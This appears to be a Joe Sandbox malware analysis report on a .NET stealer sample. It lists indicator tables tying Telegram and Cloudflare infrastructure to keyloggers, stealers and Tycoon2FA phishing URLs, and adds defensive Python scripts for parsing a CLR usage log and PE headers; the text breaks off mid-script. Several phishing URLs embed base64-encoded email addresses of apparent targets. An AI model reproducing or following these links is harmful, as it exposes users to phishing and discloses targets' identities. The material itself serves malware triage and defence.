149.154.167.220 | JUSTIFICANTE PAGO FRAS OCTUBRE 2024.exe | malicious | GuLoader, Snake Keylogger
149.154.167.220 | 9RgE5uOJwX.exe | malicious | XWorm
149.154.167.220 | app64.exe | malicious | Unknown
149.154.167.220 | na.doc | malicious | Snake Keylogger, VIP Keylogger
149.154.167.220 | na.doc | malicious | Snake Keylogger, VIP Keylogger
104.26.0.100 | http://braintumourresearch.org | malicious | Unknown
104.26.0.100 | https://www.filemail.com/t/NU6GESpW | malicious | HTMLPhisher, Tycoon2FA
104.26.0.100 | https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fkeyconserv.com%2Fskoda%2FWIA2PParYO43z1bgCVStAX12/ZHVjZXIua2FtZ2FuZ0BjbmVzc3QuZ291di5xYy5jYQ== | malicious | Unknown
104.26.0.100 | https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fkeyconserv.com%2Fskoda%2Ff1mgxnH4u4JYtjrvS13irZ65/am9zZWUub3VlbGxldEBjbmVzc3QuZ291di5xYy5jYQ== | malicious | HTMLPhisher, Tycoon2FA
104.26.0.100 | https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bg%C2%ADloba%C2%ADlproc%C2%ADessi%C2%ADngne%C2%ADtwo%C2%ADrk.%E2%80%8Bne%C2%ADt%2Ffghd%2Fgfjfjfg%2FlZUdcjNeQOlJngwGts6Dr8m3/Y2hhZC5yYXNtdXNlbkB0aGVybW9zeXN0ZW1zLmNvbQ== | malicious | HTMLPhisher, Tycoon2FA
104.26.0.100 | https://g.page/r/CbPyKO_ogGK3EAg/review | malicious | HTMLPhisher, Tycoon2FA
104.26.0.100 | P09Qwe9fqsKdQIyTGnGxNs8xS[1] | malicious | Tycoon2FA
104.26.0.100 | Remittance AdviceNote c6b2e2a43485b7b75999a5332e86646f | malicious | HTMLPhisher, Tycoon2FA
104.26.0.100 | https://www.google.com/url?q=//www.google.com.br/amp/s/iKL5afRe0S6hy3p0slRKsXiNT5VzWqeGhx.desarrollodigitales.com/xiwitytevd/sotutybgetd/qoguhtunh/I6Gu0C/cWEtc3FpQHF2Y2pwLmNvbQ== | malicious | HTMLPhisher, Tycoon2FA
Match (domain) | Associated Sample Name / URL | Detection | Threat Name | Context (resolved IP)
get.geojs.io | http://braintumourresearch.org | malicious | Unknown | 104.26.1.100
get.geojs.io | https://www.filemail.com/t/NU6GESpW | malicious | HTMLPhisher, Tycoon2FA | 104.26.0.100
get.geojs.io | https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fkeyconserv.com%2Fskoda%2FWIA2PParYO43z1bgCVStAX12/ZHVjZXIua2FtZ2FuZ0BjbmVzc3QuZ291di5xYy5jYQ== | malicious | Unknown | 172.67.70.233
get.geojs.io | https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Ffilmycurry.in%2Fskoda%2FBxs3IiLfKU2eWewQOro8W1Fa/dGVycmkucm9zYUByYXZlaXMuY29t | malicious | Tycoon2FA | 104.26.1.100
get.geojs.io | https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fkeyconserv.com%2Fskoda%2Ff1mgxnH4u4JYtjrvS13irZ65/am9zZWUub3VlbGxldEBjbmVzc3QuZ291di5xYy5jYQ== | malicious | HTMLPhisher, Tycoon2FA | 104.26.0.100
get.geojs.io | https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bg%C2%ADloba%C2%ADlproc%C2%ADessi%C2%ADngne%C2%ADtwo%C2%ADrk.%E2%80%8Bne%C2%ADt%2Ffghd%2Fgfjfjfg%2FlZUdcjNeQOlJngwGts6Dr8m3/Y2hhZC5yYXNtdXNlbkB0aGVybW9zeXN0ZW1zLmNvbQ== | malicious | HTMLPhisher, Tycoon2FA | 172.67.70.233
get.geojs.io | https://www.google.com/url?q=dCSMjVnvsqsqaP8pEWWm&rct=SpPq9HncUaCXUtCZusX0&sa=t&esrc=uZR6jk9A67Rj7RZhLuPE&source=&cd=eh0xIKCKpKh7i4kTt26p&cad=VEVtMkQKVNr1KW4fxShi&ved=NTDACygNXetEDbRT8YiY&uact=%20&url=amp/mithunaads.in/M%2f45043%2FaGFucy5hbmRlcnNvbkBhZy5zdGF0ZS5tbi51cw== | malicious | HTMLPhisher, Tycoon2FA | 104.26.1.100
get.geojs.io | https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bg%C2%ADloba%C2%ADlproc%C2%ADessi%C2%ADngne%C2%ADtwo%C2%ADrk%2E%E2%80%8Bne%C2%ADt%2Ffghd%2Fgfjfjfg%2FBpORLlSyDHhQozoQ5XBZtBNm/dGhvbHplckByZGd1c2EuY29t | malicious | HTMLPhisher, Tycoon2FA | 104.26.1.100
get.geojs.io | https://g.page/r/CbPyKO_ogGK3EAg/review | malicious | HTMLPhisher, Tycoon2FA | 172.67.70.233
api.telegram.org | PO 4500580954.exe | malicious | MassLogger RAT, PureLog Stealer | 149.154.167.220
api.telegram.org | SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe | malicious | AgentTesla | 149.154.167.220
api.telegram.org | Factura Honorarios 2024-10.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
api.telegram.org | Fernissagerne.exe | malicious | Snake Keylogger | 149.154.167.220
api.telegram.org | JUSTIFICANTE PAGO FRAS OCTUBRE 2024.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
api.telegram.org | 9RgE5uOJwX.exe | malicious | XWorm | 149.154.167.220
api.telegram.org | app64.exe | malicious | Unknown | 149.154.167.220
api.telegram.org | na.doc | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | na.doc | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
Match (ASN) | Associated Sample Name / URL | Detection | Threat Name | Context (IP)
TELEGRAMRU | PO 4500580954.exe | malicious | MassLogger RAT, PureLog Stealer | 149.154.167.220
TELEGRAMRU | SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe | malicious | AgentTesla | 149.154.167.220
TELEGRAMRU | Factura Honorarios 2024-10.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
TELEGRAMRU | Fernissagerne.exe | malicious | Snake Keylogger | 149.154.167.220
TELEGRAMRU | JUSTIFICANTE PAGO FRAS OCTUBRE 2024.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
TELEGRAMRU | 9RgE5uOJwX.exe | malicious | XWorm | 149.154.167.220
TELEGRAMRU | app64.exe | malicious | Unknown | 149.154.167.220
TELEGRAMRU | na.doc | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | na.doc | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
CLOUDFLARENETUS | SecuriteInfo.com.Trojan.PWS.Lumma.749.31391.1681.exe | malicious | LummaC, DarkTortilla, LummaC Stealer | 104.21.33.140
CLOUDFLARENETUS | 5lg7zd.elf | malicious | Unknown | 188.114.97.3
CLOUDFLARENETUS | file.exe | malicious | LummaC | 104.21.41.39
CLOUDFLARENETUS | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 188.114.96.3
CLOUDFLARENETUS | Paiement.eml | malicious | HTMLPhisher | 104.18.95.41
CLOUDFLARENETUS | PO 4500580954.exe | malicious | MassLogger RAT, PureLog Stealer | 188.114.96.3
CLOUDFLARENETUS | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 188.114.96.3
CLOUDFLARENETUS | https://pub-6838e3dd185d4df89d3bb3eabe6469a4.r2.dev/index.html# | malicious | Unknown | 104.21.48.111
CLOUDFLARENETUS | SecuriteInfo.com.Trojan.PWS.Lumma.749.8914.14992.exe | malicious | LummaC | 104.21.33.140
Match (JA3 fingerprint) | Associated Sample Name / URL | Detection | Threat Name | Context (IPs)
3b5074b1b5d032e5620f69f9f700ff0e | Paiement.eml | malicious | HTMLPhisher | 149.154.167.220, 104.26.0.100
3b5074b1b5d032e5620f69f9f700ff0e | PO 4500580954.exe | malicious | MassLogger RAT, PureLog Stealer | 149.154.167.220, 104.26.0.100
3b5074b1b5d032e5620f69f9f700ff0e | CPYEzG7VGh.exe | malicious | DCRat | 149.154.167.220, 104.26.0.100
3b5074b1b5d032e5620f69f9f700ff0e | https://jpm-ghana-2024-election-conversation-with-oct-24.open-exchange.net/join-the-call?ml_access_token=eyJjb250ZW50Ijp7ImV4cGlyYXRpb25EYXRlIjoiMjAyNC0xMC0zMVQxNToyMDo1OS4wMDZaIiwiZW1haWwiOiJyZGVpdHpAdnItY2FwaXRhbC5jb20iLCJldmVudElkIjo0MjY3Mn0sInNpZ25hdHVyZSI6Ik1FVUNJQzhaMDJJblVZd0syUk9WRkdjL1pMNHRBbWo4RmwxdW9mQjhwZzRmSjZsMkFpRUE5d25HUFFoa3ZrdkM2MlJkQ3lkM09YbnFJZ0xlQTAwMDIxNlRWbG9Hb0ZjPSJ9 | malicious | Unknown | 149.154.167.220, 104.26.0.100
3b5074b1b5d032e5620f69f9f700ff0e | SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe | malicious | AgentTesla | 149.154.167.220, 104.26.0.100
3b5074b1b5d032e5620f69f9f700ff0e | http://ffcu.online | malicious | Unknown | 149.154.167.220, 104.26.0.100
3b5074b1b5d032e5620f69f9f700ff0e | file.exe | malicious | Stealc, Vidar | 149.154.167.220, 104.26.0.100
3b5074b1b5d032e5620f69f9f700ff0e | https://token.onelogin.com-token-auth.com/Xa0Y1MmVibVhmY0E5dnlabzhVK2w2MVo4bXZUM3RzTFBZU1FSUEYxRHlzb29tODRTUDQ4alBDR3Y1cWUvN1JvVzhtWGVkaHFaSG0rOVpUTVV1VjY2a3MvZDB6TktwTHhsRk9xdzQwQjV6YjIvcnA5MjFsaFJEamtNdXI5UXQ1Qm9lK0ZsZFd0TXI0R2JWWlVYeFFXa2pBaXZOKzR2QXRkUTd3dlBLNzUrQ1RweERVMmQ5ZHQwdjlKZ2dlS2tEVUF5UEE9PS0tdFFWWndQdklZQXNodTY1US0tUXAyU1llVHhDaXRTRjU1OVNWMXFNdz09?cid=2262276963 | malicious | KnowBe4 | 149.154.167.220, 104.26.0.100
3b5074b1b5d032e5620f69f9f700ff0e | Review_&_Aprove_Your_Next_Payroll84633.html | malicious | Unknown | 149.154.167.220, 104.26.0.100
                                                                          No context
                                                                          Process:C:\Users\user\Desktop\file.exe
                                                                          File Type:CSV text
                                                                          Category:dropped
                                                                          Size (bytes):1498
                                                                          Entropy (8bit):5.364175471524945
                                                                          Encrypted:false
                                                                          SSDEEP:24:ML9E4KQwKDE4KGKZI6KhBsXE4Np51qE4GIsCKIE4TKBGKoZAE4KKUN8E4KD:MxHKQwYHKGSI6okHNp51qHGIsCtHTHhX
                                                                          MD5:5E8D4A41CB533283B16ADD9EA9F71776
                                                                          SHA1:94024969FC44AFC689F4FA71FFB5FC138653936C
                                                                          SHA-256:CB35783AEFE84715040AD54206C5D5037FFD1C2CA8061D760D32AFB54B3FC30A
                                                                          SHA-512:C95DA8F274972DF0BC4C9AA594CA871CE88583FB420B316EC9BBC300FD1FEF4BA7849458001BCCCDE055898B64F75240C38CC6D1B4E54136CEABF9D089380DA5
                                                                          Malicious:true
                                                                          Reputation:low
Preview (CR/LF rendered as ".." in the original; last record truncated):
1,"fusion","GAC",0
1,"WinRT","NotApp",1
3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0
3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0
3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\8af759007c012da690062882e06694f1\System.Management.ni.dll",0
3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0
3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Con
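The dropped CSV is not stealer output. Its layout (record type, quoted assembly display name, native-image path under NativeImages_v4.0.30319_64, trailing flag) is the per-executable usage log the .NET 4 runtime writes as an assembly loads, so it records which framework assemblies file.exe pulled in, which is what makes it worth keeping: System.Management is the WMI client behind the Win32_DiskDrive, Win32_VideoController, Win32_Processor and Win32_ComputerSystem queries flagged in the signatures, and System.Drawing is screenshot and image handling. The parser below is an added example, not code from the report. SAMPLE_LOG is constructed from the complete records visible in the preview; the record-type and flag columns are carried through without interpretation because the page does not document them, and the capability mapping is this example's own heuristic.

```python
"""Triage a .NET CLR usage log (the CSV artifact dropped by file.exe).

Added example, not part of the Joe Sandbox report. Each record is
<kind>,"<name>","<location>",<flag>; the meaning of <kind> and <flag> is not
documented on the page, so they are kept as integers and not interpreted.
SAMPLE_LOG is constructed from the complete records in the report's preview.
"""
import csv
import io

SAMPLE_LOG = r'''1,"fusion","GAC",0
1,"WinRT","NotApp",1
3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0
3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0
3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\8af759007c012da690062882e06694f1\System.Management.ni.dll",0
3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0
'''

# Framework assemblies whose presence hints at a capability. This mapping is
# the example's own heuristic, not something the report states.
CAPABILITY_HINTS = {
    "System.Management": "WMI queries (hardware, AV and VM checks)",
    "System.Drawing": "screen capture / image handling",
    "System.Net.Http": "HTTP client",
    "System.Security": "DPAPI / ProtectedData access",
}


def parse_usage_log(text):
    """Return a list of (kind, name, location, flag) tuples, one per record."""
    records = []
    for row in csv.reader(io.StringIO(text)):
        if len(row) != 4:
            continue  # blank or malformed line
        kind, name, location, flag = row
        records.append((int(kind), name, location, int(flag)))
    return records


def loaded_assemblies(records):
    """Map simple assembly name -> location for assembly-load records.

    A record is treated as an assembly load when its name is a .NET display
    name (contains 'Version='); the other records are runtime context entries
    such as the "fusion"/"GAC" and "WinRT"/"NotApp" lines.
    """
    assemblies = {}
    for _kind, name, location, _flag in records:
        if "Version=" not in name:
            continue
        simple = name.split(",", 1)[0].strip()
        assemblies[simple] = location
    return assemblies


def capability_hints(assemblies):
    """Subset of CAPABILITY_HINTS for the assemblies actually loaded."""
    return {name: CAPABILITY_HINTS[name] for name in assemblies if name in CAPABILITY_HINTS}


if __name__ == "__main__":
    recs = parse_usage_log(SAMPLE_LOG)
    asms = loaded_assemblies(recs)
    for name, path in asms.items():
        print(f"{name:20} {path}")
    for name, hint in capability_hints(asms).items():
        print(f"hint: {name} -> {hint}")
```

On a live host the same parser applied to the log the runtime wrote for the suspect process gives a quick capability inventory before any disassembly; the hints are a prompt for where to look, not a verdict.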
                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Entropy (8bit):5.811683523254202
                                                                          TrID:
                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                          • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                          • Windows Screen Saver (13104/52) 0.07%
                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
File name: file.exe
File size: 141'824 bytes
MD5: cae3f7ae06655eb93f5dfb028ddd3d6d
SHA1: 54821b16fab00ec529f0b99e1d49de8d291eb492
SHA256: 1fc74fb83aebbe5a37b41e7a4e900a83288618ca696d76a717e2d6a51fad343f
SHA512: e2226e3ba2c9bd079db74dcc0cb87f8d6449c99dfe3d2ccae0dda40b7c1a1ca3b77341e49c72bbb183aca86fd29960a70836bfb758f42c3bf83605b3f808dad8
SSDEEP: 1536:6KQx+JZ4AV5zOvv24ajo8OFbebA+fnnlNWu0SBs54K4UAfJw1oKrY14a9ilmdz82:6RxSdvzODaM8Olevnlp65mJw1bpuMuf
TLSH: 24D318246ADB0525D37F9AB4DFE8E4A4CAA5E1120E0BF67B584256C31F12BC0ED4347B
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....."g.........."...0.. ...........?... ...@....@.. ....................................`................................
Icon Hash: 00928e8e8686b000
Entrypoint: 0x423fde
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x6722A9CE [Wed Oct 30 21:49:02 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744
Instruction (entrypoint preview, disassembled from 0x423fde). Only the first instruction is real code: the 6-byte native stub `jmp dword ptr [00402000h]` that every managed executable carries, jumping through the IAT slot at VA 0x402000 (the IAT directory at RVA 0x2000, whose single entry is mscoree.dll!_CorExeMain) so that the CLR takes over. The stub ends at 0x423fe4, which is exactly the end of .text (RVA 0x2000 + virtual size 0x21fe4), so everything after it is section slack and adjacent data that the disassembler decodes as mostly `add byte ptr [eax], al` (zero bytes); it is not executed.
                                                                          jmp dword ptr [00402000h]
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add al, byte ptr [eax]
                                                                          adc byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          and byte ptr [eax], al
                                                                          add byte ptr [eax+00000018h], al
                                                                          push eax
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], 00000000h
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add dword ptr [eax], eax
                                                                          add dword ptr [eax], eax
                                                                          add byte ptr [eax], al
                                                                          cmp byte ptr [eax], al
                                                                          add byte ptr [eax+00000000h], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add dword ptr [eax], eax
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], 00000000h
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [ecx], al
                                                                          add byte ptr [ecx], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax+00h], ch
                                                                          add byte ptr [eax+00000000h], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add dword ptr [eax], eax
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          nop
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax+3C000240h], ah
                                                                          add eax, dword ptr [eax]
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add ah, bl
                                                                          inc ebx
                                                                          add al, byte ptr [eax]
                                                                          jmp far 0000h : 00000001h
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [ebx+eax], bh
                                                                          xor al, 00h
                                                                          add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x23f88 | 0x53 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x24000 | 0x5c6 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x26000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x21fe4 | 0x22000 | 32195bec153f5890c3ec987fb4af7b35 | False | 0.4589700137867647 | data | 5.8437436511111285 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x24000 | 0x5c6 | 0x600 | 5914c5cf9208fd0654d13215d0e80b7f | False | 0.4231770833333333 | data | 4.119542434889894 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x26000 | 0xc | 0x200 | 7a38deb677a00f9744abd6f5fc5f6536 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x240a0 | 0x33c | data | | | 0.4251207729468599
RT_MANIFEST | 0x243dc | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
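The header facts above fit together: the IAT directory sits at RVA 0x2000 (VA 0x402000), the COM descriptor (CLR header) follows it at RVA 0x2008, and the only native import is mscoree.dll!_CorExeMain, which is what the `jmp dword ptr [00402000h]` at the entrypoint reaches. The script below is an added example and not part of the Joe Sandbox report: it parses these headers with the Python standard library only, checks that the entrypoint is the 6-byte `FF 25` stub, and checks that the jump target falls inside the IAT directory. Since the analysed file is not available here, it builds a constructed PE32 with the same layout (image base, entrypoint, .text section, IAT and CLR directories) and empty import and CLR tables; the offsets inside build_sample_pe are illustrative and any PE32 file can be passed to dotnet_entry_stub instead.

```python
"""Verify that a PE32's entrypoint is the standard .NET native stub.

Added example, not part of the Joe Sandbox report. Stdlib only. The sample
PE is constructed inline to mirror the report's layout and is not the
analysed binary.
"""
import struct

IAT_DIR, CLR_DIR = 12, 14          # data directory indices (IAT, COM_DESCRIPTOR)


def _rva_to_offset(sections, rva):
    """Map an RVA to a file offset using the section table (raw data only)."""
    for _name, va, _vsize, raw_ptr, raw_size in sections:
        if va <= rva < va + raw_size:
            return raw_ptr + (rva - va)
    raise ValueError(f"RVA {rva:#x} is not backed by file data")


def parse_pe(data):
    """Return entrypoint RVA, image base, data directories and section table of a PE32."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    coff = e_lfanew + 4
    _machine, nsections, _ts, _sym, _nsym, opt_size, _chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 (32-bit) optional headers are handled here")
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    image_base = struct.unpack_from("<I", data, opt + 28)[0]
    num_dirs = struct.unpack_from("<I", data, opt + 92)[0]
    dirs = {i: struct.unpack_from("<II", data, opt + 96 + 8 * i) for i in range(num_dirs)}
    sections = []
    for i in range(nsections):
        name, vsize, va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", data, opt + opt_size + 40 * i)
        sections.append((name.rstrip(b"\0").decode(), va, vsize, raw_ptr, raw_size))
    return {"entry_rva": entry_rva, "image_base": image_base, "dirs": dirs, "sections": sections}


def dotnet_entry_stub(data):
    """Check for a CLR header and for 'FF 25 <VA>' at the entrypoint targeting the IAT."""
    pe = parse_pe(data)
    clr_rva, _clr_size = pe["dirs"].get(CLR_DIR, (0, 0))
    if clr_rva == 0:
        return {"is_dotnet": False}
    iat_rva, iat_size = pe["dirs"].get(IAT_DIR, (0, 0))
    stub = data[_rva_to_offset(pe["sections"], pe["entry_rva"]):][:6]
    target = struct.unpack_from("<I", stub, 2)[0] if stub[:2] == b"\xff\x25" else None
    iat_va = pe["image_base"] + iat_rva
    return {
        "is_dotnet": True,
        "entry_va": pe["image_base"] + pe["entry_rva"],
        "jmp_target": target,
        "stub_ok": target is not None and iat_va <= target < iat_va + iat_size,
    }


def build_sample_pe():
    """Constructed PE32 with the report's layout: image base 0x400000, .text at RVA
    0x2000 (vsize 0x21fe4, raw 0x22000 at offset 0x200), entry 0x423fde, IAT at
    RVA 0x2000, CLR header at RVA 0x2008. Import and CLR tables are left empty."""
    image_base, text_rva, text_vsize, text_raw, raw_ptr = 0x400000, 0x2000, 0x21FE4, 0x22000, 0x200
    entry_rva = 0x23FDE
    buf = bytearray(raw_ptr + text_raw)
    buf[:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x80)                       # e_lfanew
    pe = 0x80
    buf[pe:pe + 4] = b"PE\0\0"
    struct.pack_into("<HHIIIHH", buf, pe + 4, 0x14C, 1, 0x6722A9CE, 0, 0, 0xE0, 0x0022)
    opt = pe + 24
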